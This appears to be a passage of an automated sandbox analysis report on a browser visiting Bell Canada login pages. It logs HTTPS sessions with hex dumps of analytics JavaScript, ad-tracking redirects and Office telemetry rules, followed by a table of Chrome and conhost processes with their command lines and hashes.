                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC8192INData Raw: 3f 29 28 2e 2b 3f 29 5c 31 5c 5d 29 7c 28 3f 3a 5c 2e 3f 28 5b 5e 2e 5c 6e 5c 5b 5c 5d 5d 2b 29 5c 2e 3f 29 2f 67 2c 57 62 3d 2f 5e 64 61 74 61 4c 61 79 65 72 5c 5b 20 2a 5b 30 2d 39 5d 2b 20 2a 5c 5d 2f 3b 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 61 26 26 6e 75 6c 6c 21 3d 3d 61 3f 67 28 63 28 61 2c 62 29 29 3a 62 7d 66 75 6e 63 74 69 6f 6e 20 63 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6a 2e 64 69 66 66 5f 6d 61 69 6e 28 61 2c 62 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 62 26 26 28 61 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 3f 62 3a 66 28 61 2c 62 29 29 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 65 28 61 29 7b 66 6f 72
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ?)(.+?)\1\])|(?:\.?([^.\n\[\]]+)\.?)/g,Wb=/^dataLayer\[ *[0-9]+ *\]/;!function(a){function b(a,b){return void 0!==a&&null!==a?g(c(a,b)):b}function c(a,b){return j.diff_main(a,b)}function d(a,b){return b&&(a="string"==typeof b?b:f(a,b)),a}function e(a){for
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC8192INData Raw: 2c 74 68 69 73 2e 72 65 70 6c 61 79 4d 65 74 68 6f 64 3d 6f 63 2e 52 41 4e 44 4f 4d 2c 74 68 69 73 2e 72 65 70 6c 61 79 53 65 73 73 69 6f 6e 3d 6c 63 2e 53 45 52 56 45 52 2c 74 68 69 73 2e 72 65 70 6c 61 79 4c 65 61 64 3d 6c 63 2e 53 45 52 56 45 52 2c 54 28 70 63 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 5b 62 5d 3d 56 28 61 29 7c 7c 30 7d 2c 74 68 69 73 29 2c 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 54 79 70 65 7c 7c 28 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 54 79 70 65 3d 6d 63 2e 44 41 54 41 5f 43 52 45 44 49 54 29 2c 74 68 69 73 2e 65 78 70 65 72 69 65 6e 63 65 4d 65 74 68 6f 64 3d 3d 3d 6f 63 2e 50 52 45 5f 4d 49 47 52 41 54 45 44 26 26 28 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 54 79 70 65 3d 6d 63 2e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ,this.replayMethod=oc.RANDOM,this.replaySession=lc.SERVER,this.replayLead=lc.SERVER,T(pc,function(a,b){this[b]=V(a)||0},this),this.subscriptionType||(this.subscriptionType=mc.DATA_CREDIT),this.experienceMethod===oc.PRE_MIGRATED&&(this.subscriptionType=mc.
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC8192INData Raw: 6f 63 65 73 73 43 73 73 46 6e 28 61 2e 65 6c 29 2c 62 63 2e 69 73 45 6d 70 74 79 28 62 29 3f 61 2e 6e 61 3d 4a 63 3a 28 64 65 6c 65 74 65 20 61 2e 6e 61 2c 62 2e 74 6f 6f 4c 61 72 67 65 26 26 28 62 63 2e 6c 73 74 79 6c 65 3d 21 30 29 2c 62 2e 68 72 65 66 3f 28 61 2e 6e 61 3d 22 4c 49 4e 4b 22 2c 63 2e 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2c 63 2e 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 2c 63 2e 68 72 65 66 3d 62 2e 68 72 65 66 2c 62 2e 6d 65 64 69 61 26 26 28 63 2e 6d 65 64 69 61 3d 62 2e 6d 65 64 69 61 29 2c 64 65 6c 65 74 65 20 63 2e 64 69 73 61 62 6c 65 64 29 3a 28 61 2e 68 3d 62 2e 63 6f 6e 74 65 6e 74 2c 61 2e 6e 61 3d 22 53 54 59 4c 45 22 2c 64 65 6c 65 74 65 20 63 2e 74 79 70 65 2c 64 65 6c 65 74 65 20 63 2e 72 65 6c 2c 64 65 6c 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ocessCssFn(a.el),bc.isEmpty(b)?a.na=Jc:(delete a.na,b.tooLarge&&(bc.lstyle=!0),b.href?(a.na="LINK",c.type="text/css",c.rel="stylesheet",c.href=b.href,b.media&&(c.media=b.media),delete c.disabled):(a.h=b.content,a.na="STYLE",delete c.type,delete c.rel,dele


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      147192.168.2.94995152.223.40.1984433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC659OUTGET /track/cmf/generic?ttd_pid=aam&gdpr=0&gdpr_consent=&domain=mybell.bell.ca&ttd_tpi=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: match.adsrvr.org
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                      Referer: https://bellca.demdex.net/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC518INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:14 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 245
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      server: Kestrel
                                                                                                                                                                                                                                                                                                                                      location: https://match.adsrvr.org/track/cmb/generic?ttd_pid=aam&gdpr=0&gdpr_consent=&domain=mybell.bell.ca&ttd_tpi=1
                                                                                                                                                                                                                                                                                                                                      set-cookie: TDID=d5095770-96af-43e0-8b13-9a680ab5a9e6; expires=Fri, 31 Oct 2025 13:12:14 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                      set-cookie: TDCPM=CAEYBSgCMgsItIWf6ovuvD0QBTgB; expires=Fri, 31 Oct 2025 13:12:14 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:14 UTC245INData Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73 72 76 72 2e 6f 72 67 2f 74 72 61 63 6b 2f 63 6d 62 2f 67 65 6e 65 72 69 63 3f 74 74 64 5f 70 69 64 3d 61 61 6d 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 26 64 6f 6d 61 69 6e 3d 6d 79 62 65 6c 6c 2e 62 65 6c 6c 2e 63 61 26 74 74 64 5f 74 70 69 3d 31 22 3e 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73 72 76 72 2e 6f 72 67 2f 74 72 61 63 6b 2f 63 6d 62 2f 67 65 6e 65 72 69 63 3f 74 74 64 5f 70 69 64 3d 61 61 6d 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 26 64 6f 6d 61 69 6e 3d 6d 79 62 65 6c 6c 2e 62 65 6c 6c 2e 63 61 26 74 74 64 5f 74 70 69 3d 31 3c 2f 61 3e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: Redirecting to: <a href="https://match.adsrvr.org/track/cmb/generic?ttd_pid=aam&gdpr=0&gdpr_consent=&domain=mybell.bell.ca&ttd_tpi=1">https://match.adsrvr.org/track/cmb/generic?ttd_pid=aam&gdpr=0&gdpr_consent=&domain=mybell.bell.ca&ttd_tpi=1</a>


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      148192.168.2.94995513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:15 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1390
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 93439f28-801e-00ac-63f6-2afd65000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131215Z-16849878b78zqkvcwgr6h55x9n00000008xg00000000hnan
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      149192.168.2.94995213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:15 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 1360
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131215Z-16849878b78wc6ln1zsrz6q9w8000000095g00000000gsgf
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:15 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                                                                      Start time:09:11:43
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                                                                      Start time:09:11:49
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                                                                      Start time:09:11:51
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mybell.bell.ca/Login?language=en"
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                                                                                                      Start time:09:12:05
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4184 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                                                                                      Start time:09:12:05
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=2264,i,8939700929347395739,7703461295604259672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                                                                                      Start time:09:12:06
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://m.bell.ca/getapploginpage
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                                                                                                      Start time:09:12:06
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 --field-trial-handle=1064,i,6441221849923588881,12403408043935428112,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                                                                                                      Start time:09:12:21
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://m.bell.ca/supportrqcode
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                                                                                                      Start time:09:12:21
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1616 --field-trial-handle=2012,i,16209123222516514220,5828609412293976285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                                                                                                      Start time:09:12:39
                                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                      No disassembly